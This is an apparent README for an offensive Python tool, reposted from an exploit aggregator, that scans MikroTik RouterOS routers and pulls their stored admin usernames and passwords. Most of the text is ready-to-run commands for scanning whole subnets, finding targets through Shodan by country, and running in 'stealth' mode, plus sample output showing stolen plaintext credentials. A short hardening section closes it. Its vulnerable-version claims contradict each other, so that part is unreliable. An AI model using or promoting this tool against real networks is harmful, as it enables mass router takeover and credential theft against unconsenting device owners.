Share
## https://sploitus.com/exploit?id=0E40D288-081E-5B45-A270-EE41E0D8D71D
# Mikrotik Exploit
Scan and Export RouterOS Password
A security research tool for scanning and extracting credentials from Mikrotik RouterOS devices using the Chimay-Red exploit (CVE-2017-20149).
## โ ๏ธ Legal Disclaimer
**This tool is for authorized security testing and research purposes only.** Only use this tool on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical.
## โจ Features
### Core Features
- **Multi-threaded scanning** - Fast parallel scanning of multiple targets
- **Multiple output formats** - Text, JSON, CSV, and HTML reports
- **Progress tracking** - Real-time progress bars and statistics
- **Structured logging** - Detailed logging with configurable levels
- **Shodan integration** - Automated target discovery via Shodan API
- **Flexible input** - Support for single IPs, CIDR ranges, and file lists
- **Modern codebase** - Type hints, proper error handling, and clean architecture
### Advanced Features (Enhanced Scanner)
- **IP Geolocation** - Automatic geolocation lookup for scanned IPs
- **Version Detection** - Detect RouterOS version and skip incompatible versions
- **Checkpoint/Resume** - Save progress and resume interrupted scans
- **Rate Limiting** - Configurable delays and stealth modes
- **Color Output** - Color-coded terminal output for better readability
- **Configuration Files** - YAML/JSON config files for persistent settings
- **Multiple Ports** - Scan multiple ports simultaneously
- **Enhanced Statistics** - Version distribution, country stats, duration tracking
- **Security Warnings** - Permission checks and confirmations for large scans
## ๐ Requirements
- Python 3.6+
- pip (Python package manager)
## ๐ Installation
### Quick Install
```bash
# Clone the repository
git clone https://github.com/bgoldmann/Mikrotik-Exploit.git
cd Mikrotik-Exploit
# Install dependencies
pip3 install -r requirements.txt
```
### Manual Installation
```bash
# Core dependencies
pip3 install ipcalc requests
# Optional but recommended
pip3 install tqdm # Progress bars
pip3 install shodan # Shodan API support
```
## ๐ Usage
### Basic Usage
```bash
# Scan single IP (standard scanner)
python3 scanner.py 192.168.1.10
# Scan single IP (enhanced scanner with all features)
python3 scanner_enhanced.py 192.168.1.10
# Scan subnet (CIDR notation)
python3 scanner_enhanced.py 192.168.1.0/24
# Scan with custom port
python3 scanner_enhanced.py 192.168.1.10 -p 8282
# Scan from file (one IP per line)
python3 scanner_enhanced.py -f targets.txt
```
### Enhanced Features
```bash
# With geolocation and version detection
python3 scanner_enhanced.py 192.168.1.0/24 --geolocation --version-detect
# Resume interrupted scan
python3 scanner_enhanced.py -f targets.txt --checkpoint --resume
# Multiple ports with rate limiting
python3 scanner_enhanced.py 192.168.1.0/24 --ports 8291,8282 --rate-limit 0.5
# Stealth mode scanning
python3 scanner_enhanced.py 192.168.1.0/24 --stealth stealth
# Use configuration file
python3 scanner_enhanced.py 192.168.1.0/24 --config config.yaml
# HTML report output
python3 scanner_enhanced.py 192.168.1.0/24 --format html -o report.html
```
### Advanced Options
```bash
# Multi-threaded scanning (default: 10 threads)
python3 scanner.py 192.168.1.0/24 -t 20
# Custom timeout
python3 scanner.py 192.168.1.0/24 --timeout 2.0
# Output to JSON file
python3 scanner.py 192.168.1.0/24 --format json -o results.json
# Output to CSV file
python3 scanner.py 192.168.1.0/24 --format csv -o results.csv
# Verbose logging
python3 scanner.py 192.168.1.0/24 -v
# Quiet mode (errors only)
python3 scanner.py 192.168.1.0/24 -q
# Log to file
python3 scanner.py 192.168.1.0/24 --log-file scan.log
```
### Shodan Integration
```bash
# Search and scan Mikrotik routers via Shodan
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS" port:8291' --shodan-key YOUR_API_KEY
# Export Shodan results to file
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-export targets.txt
# Filter by country
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-country US --shodan-key YOUR_API_KEY
# Limit results
python3 scanner.py --shodan-query 'product:"MikroTik RouterOS"' --shodan-limit 50 --shodan-key YOUR_API_KEY
```
**Note:** Get your Shodan API key from [https://account.shodan.io/](https://account.shodan.io/)
### Command-Line Options
```
positional arguments:
targets IP address(es) or CIDR range(s)
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing IP addresses (one per line)
-p PORT, --port PORT Target port (default: 8291)
-t THREADS, --threads THREADS
Number of threads (default: 10)
--timeout TIMEOUT Connection timeout in seconds (default: 1.0)
--format {text,json,csv}
Output format (default: text)
-o OUTPUT, --output OUTPUT
Output file path
-v, --verbose Verbose output (DEBUG level)
-q, --quiet Quiet mode (ERROR only)
--log-file LOG_FILE Log file path
--shodan-query QUERY Shodan search query
--shodan-key KEY Shodan API key (or set SHODAN_API_KEY env var)
--shodan-limit LIMIT Maximum Shodan results (default: 100)
--shodan-country CODE Filter Shodan results by country code
--shodan-export FILE Export Shodan results to file instead of scanning
```
## ๐ Output Formats
### Text Format (Default)
```
192.168.1.10:8291
User: admin
Pass: password123
------------------
Summary: 1/1 successful
```
### JSON Format
```json
{
"summary": {
"total": 1,
"success": 1,
"failed": 0,
"timeout": 0,
"refused": 0,
"error": 0
},
"results": [
{
"ip": "192.168.1.10",
"port": 8291,
"success": true,
"credentials": [
["admin", "password123"]
]
}
]
}
```
### CSV Format
```csv
IP,Port,Username,Password
192.168.1.10,8291,admin,password123
```
## ๐ Vulnerable Versions
This exploit targets RouterOS versions:
- **6.29** (released: 2015-05-28) to **6.42** (released: 2018-04-20)
- Patched in version **6.38.5** and later
**Note:** This vulnerability (CVE-2017-20149) has been patched. Only use on systems you own or have permission to test.
## ๐ก๏ธ Secure Your Router
If you're a router administrator, protect your device:
1. **Update RouterOS** to the latest version
2. **Limit Winbox access** to specific IPs:
```bash
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
3. **Use strong passwords**
4. **Disable unnecessary services**
5. **Regular security audits**
## ๐ Project Structure
```
MikrotikExploit/
โโโ scanner.py # Standard scanner (modernized)
โโโ scanner_enhanced.py # Enhanced scanner (all advanced features)
โโโ loop.py # Legacy scanner (backward compatibility)
โโโ extract_user.py # Credential extraction module
โโโ config/
โ โโโ payloads.py # Exploit payloads
โ โโโ example.yaml # Example configuration file
โโโ utils/
โ โโโ logger.py # Logging utilities
โ โโโ shodan_client.py # Shodan API client
โ โโโ geolocation.py # IP geolocation services
โ โโโ version_detector.py # RouterOS version detection
โ โโโ checkpoint.py # Checkpoint/resume functionality
โ โโโ rate_limiter.py # Rate limiting and stealth mode
โ โโโ colors.py # Color output utilities
โ โโโ config_loader.py # Configuration file loader
โโโ requirements.txt # Python dependencies
โโโ README.md # This file
โโโ CHANGELOG.md # Version history
โโโ UPGRADE_OPTIONS.md # Upgrade recommendations
```
## ๐ Migration from loop.py
The new `scanner.py` is backward compatible with `loop.py` but with enhanced features:
```bash
# Old way (still works)
python3 loop.py 192.168.1.10
# New way (recommended)
python3 scanner.py 192.168.1.10
```
## ๐ค Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Submit a pull request
## ๐ License
MIT License - See [LICENSE](LICENSE) file for details.
## ๐ Credits
This repository is forked from:
- [BigNerd95/Chimay-Red](https://github.com/BigNerd95/Chimay-Red)
- [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC)
With enhancements for subnet scanning, custom ports, IP lists, and modern Python practices.
## Secure your router
**Update RouterOS and limit Winbox login**
```
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
## Copyright
this repository forked from [BigNerd95/Chimay-Red](https://github.com/BigNerd95/Chimay-Red) and [BasuCert/WinboxPoC](https://github.com/BasuCert/WinboxPoC) with some changes for subnet scan, use different port and IP list file.